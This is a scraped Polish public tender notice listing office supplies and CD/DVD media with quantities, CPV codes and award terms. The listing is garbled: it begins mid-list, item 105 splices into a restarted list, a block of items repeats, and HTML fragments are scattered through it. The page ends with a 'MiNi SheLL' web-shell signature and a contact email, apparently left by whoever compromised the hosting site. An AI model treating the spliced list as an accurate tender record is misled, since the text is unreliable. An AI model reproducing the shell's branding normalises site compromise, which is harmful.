102.	Zszywacz biurowy; zszywający do 30 kartek; na zszywki 24-6	szt	100
103.	Zszywacz biurowy; zszywający do 70 kartek; na zszywki 23=13	szt. 	6
104.	Zszywki 23-13	op	10
105.	Zszywki 241.	Blok milimetrowy A3	szt	6
2.	Blok milimetrowy A4	szt	4
3.	Bristol biały B 1 10 szt (100x70)	op. 	4
4.	Blok Techniczny A4	szt	40
5.	Brulion A4  96 str. kratka twarda okładka	szt.	240
6.	Datownik	szt	40
7.	Długopisy jednorazowe różne - automatyczne	szt	2000
8.	Dyskietki 3,5 1.44 MB 2HD op. 10 szt	op	6
9.	Dziennik korespondencyjny	szt	100
10.	Dziurkacz; dziurkuje co najmniej 20-25 kartek, średnica dziurek 5,5 mm ; odległość między dziurkami 80 mm	szt.	30
11.	Dziurkacz; dziurkuje co najmniej 50 kartek, średnica dziurek 5,5 mm ; odległość między dziurkami 80 mm	szt 	6
12.	Etykiety samoprzylepne A4 100 ark.  48,5x16,9	op	10
13.	Folia do laminowania 100 mikronów op. 100 szt. A4	op.	30
14.	Folia do laminowania 100 mikronów op. 100 szt. A5	op.	10
15.	Folia do laminowania 100 mikronów op. 100 szt. A3	op.	6
16.	Folia do faksu Panasonic KX-FP 121 1 op  a 2 szt	op	6
17.	Folia do drukarki laser 1 op  a 100 szt 	op 	6
18.	Folia do faksu Panasonic KX-FA 57 E 1 op a 2 szt	op	6
19.	Grzbiety do bindowania  10 mm op. 100szt	op.	6
20.	Grzbiety do bindowania  12 mm op. 100szt	op.	6
21.	Grzbiety do bindowania  18 mm op. 100szt	op.	6
22.	Grzbiety do bindowania  8 mm op. 100szt	op.	6
23.	Kalka maszynowa A4 op 25 arkuszy	op.	80
24.	Kalka ołówkowa A4 op 25 arkuszy	op.	80
25.	Karteczki samoprzylepne kolorowe 75x75 bloczek 100 kartek	op.	1000
26.	Kostka wkład kolor lub biały 	op.	60
27.	Klej  uniwersalny szkolno-biurowy tuba 40 ml 	szt.	100
28.	Klej w płynie 40 ml	szt.	100
29.	Klej w sztyfcie 30 g	szt.	120
30.	Klipsy do papieru 50 mm opak 12 szt	op	20
31.	Koszulki A5 op. 100 szt	op	16
32.	Kubki plastykowe białe 200ml z atestem PHZ  op. 100 szt	op	60
33.	Marker do opisywania bielizny wodoodporny,  czarny 	szt.	1600
34.	Marker czerwony 	szt.	400
35.	Marker do opisywania sprzętu wodoodporny, olejowy,  czarny 	szt	40
36.	Marker do szkła cienki, czarny, 1,3 - 1,5mm	szt	500
37.	Mazak czarny	szt.	800
38.	Mazak czerwony	szt	400
39.	Naklejki na segregator 1 op  a 10 szt 	op	100
40.	Nawilżacz glicerynowy (poj. ok. 20 ml )	szt	40
41.	Notatnik szkolny A4  50 kartek, kratka, biały 	szt.	120
42.	Nożyczki 21 cm	szt	100
43.	Obwoluta A4 koszulka op. 100 szt	op	400
44.	Okładki do bindowania przód przezroczyste op. 100 szt	op	6
45.	Okładki do bindowania tył czarne op. 100 szt	op.	6
46.	Okładki do bindowania tył niebieskie op. 100 szt	op.	6
47.	Ołówki twardość HB.	szt	200
48.	Papier do faksu 210x6 rolka, 15 m	szt.	100
49.	Papier do faksu 216x6 rolka, 15 m	szt.	600
50.	Papier do faksu 216 - 30 m	rol 	60
51.	Papier termoczuły 110/20	rol 	60
52.	Papier termoczyły 57-20	rol 	60
53.	Papier kancelaryjny A4 kratka  pakowane  500arkuszy	op.	30
54.	Papier kancelaryjny A3 kratka pakowane po 500 arkuszy	op.	4
55.	Papier kolorowy A3 op. 500 ark  żółty, pastalowy	op	2
56.	Papier kolorowy A3 op. 500 ark. niebieski ( turkus ), pastelowy	op	2
57.	Papier kolorowy A3 op. 500 ark. różowy, pastelowy	op	2
58.	Papier kolorowy A4 op 100 ark. pastelowy	op	10
59.	Papier ksero A3 80g-m2 op. 500 ark. białość 146 CIE	op.	20
60.	Papier ksero A4 80g-m2 op. 500 ark. białość CIE 146	op.	4000
61.	Papier maszynowy A4 a 500 arkuszy	op.	60
62.	Papier pakowny szary - arkusze -	arkusze	100
63.	Papier przebitka A4 a 500szt.	op.	10
64.	Pinezki do tablicy korkowej	op.	30
65.	Pisaki do szła typ Sharpie - Ultra Fine Point	szt.	60
66.	Pisaki do szła typ Sharpie - Fine Point	szt.	60
67.	Poduszka do pieczątek, bez natuszowania wymiary ok. 55 x 80 mm	szt.	30
68.	Płyn korekcyjny biały rodzaj buteleczka, pojemnośc ok. 20 ml.	szt.	100
69.	Pudełka archiwizacyjne tekturowe wymiary wys. 35cm x 26,5cm x 10cm	szt.	3000
70.	Rolki  do kalkulatorów offsetowe 57mm-60m	szt 	100
71.	Rozszywacz	szt.	60
72.	Segregator A4 szerokość grzbietu 50 mm z dźwigniowym mechanizmem zamykającym , tekturowy powleczony folią polipropylenową, dolne krawędzie wzmocnione okuciami, na grzbiecie otwór na palec	szt.	200
73.	Segregator A4 szerokość grzbietu 75 mm z dźwigniowym mechanizmem zamykającym , tekturowy powleczony folią polipropylenową, dolne krawędzie wzmocnione okuciami, na grzbiecie otwór na palec	szt.	700
74.	Serwetki gastronomiczne	op.	200
75.	Skoroszyt  kartonowy hakowy połówkowy	szt.	2000
76.	Skoroszyt kartonowy hakowy pełny	szt.	1000
77.	Skoroszyt A4  z PP z bezbarwną przednią okładką wpinany do segregatora	szt	1000
78.	Skorowidz -alfabetyczny - A4	szt	20
79.	Skorowidz - alfabetyczny - A5	szt	20
80.	Spinacze biurowe 25mm, opak 100 szt.	op	1400
81.	Spinacze biurowe 50 mm op. 100 szt.	op	400
82.	Sznurek pakowy 3 dkg	szt	200
83.	Sznurek z tworzywa sztucznego poilpropylenowy 500g	szt	80
84.	Taśma biurowa klejąca 18-30	szt.	600
85.	Taśma dwustronna szerokość 38 mm, długość 5 m.	szt	120
86.	Taśma pakowa 5-6 cm długośc 50 m bieżących 6 szt.	op	40
87.	Teczka akt osobowych - skóropodobne tworzywo - twarda okładka	szt	200
88.	Teczka  do podpisu - grzbiet harmonikowy z kartonu pokryte skóropodobnym tworzywem - 15 k	szt	60
89.	Teczka  do podpisu - grzbiet harmonikowy z kartonu pokryte skóropodobnym tworzywem - min  20 k	szt	40
90.	Teczka z gumką	szt	600
91.	Teczki  wiązane A4  białe	szt.	4000
92.	Tusz do bielizny 50 ml, wytrzymały na wysoką temperaturą prania.	szt	4
93.	Tusz do pieczątek niebieski	szt.	160
94.	Tusz do pieczątek czarny	szt.	200
95.	Tusz do pieczątek fiolet	szt.	100
96.	Zakreślacz typu Point Office (rózne kolory)	szt	400
97.	Zeszyt A4  96 str. Kratka zwykła okładka	szt.	800
98.	Zeszyt A5  16 str. Kratka zwykła okładka	szt.	100
99.	Zeszyt A5  32 str. Kratka zwykła okładka	szt.	300
100.	Zeszyt A5  60 str. Kratka zwykła okładka	szt.	600
101.	Zeszyt A5 100 str. Kratka twarda okładka	szt.	40
102.	Zszywacz biurowy; zszywający do 30 kartek; na zszywki 24-6	szt	100
103.	Zszywacz biurowy; zszywający do 70 kartek; na zszywki 23-13	szt. 	6
104.	Zszywki 23-13	op	10
105.	Zszywki 24-6	op	1400
106.	Kredki ołówkowe 24 kolory	op	12
107.	Papier termoczuły do kasy fiskalnej	rol.	1400
108.	Papier termoczuły do kasy fiskalnej RTO 2830 W (28x30)	rol.	200
109.	Półka plastikowa na dokumenty (t.zw. korytko)	szt.	100
110.	Marker z okrągłą końcówką (czarny)	szt.	120

106.	Kredki ołówkowe 24 kolory	op	12
107.	Papier termoczuły do kasy fiskalnej	rol.	1400
108.	Papier termoczuły do kasy fiskalnej RTO 2830 W (28x30)	rol.	200
109.	Półka plastikowa na dokumenty (t.zw. korytko)	szt.	100
110.	Marker z okrągłą końcówką (czarny)	szt.	120.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 22.80.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Pakiet nr 4 Płyty CD, DVD.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pakiet nr 4 Płyty CD, DVD
1.	Płyty CD do nadruku atramentowego	szt	25000
2.	Płyty CD-RW 700 MB w pudełku tradycyjnym op. 10 szt	op	20
3.	Płyty DVD+ R	szt.	1000
4.	Płyty DVD+ R w pudełku slim	szt	200
5.	Płyty DVD+ RW w pudełku slim	szt	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 30.23.40.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 24.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com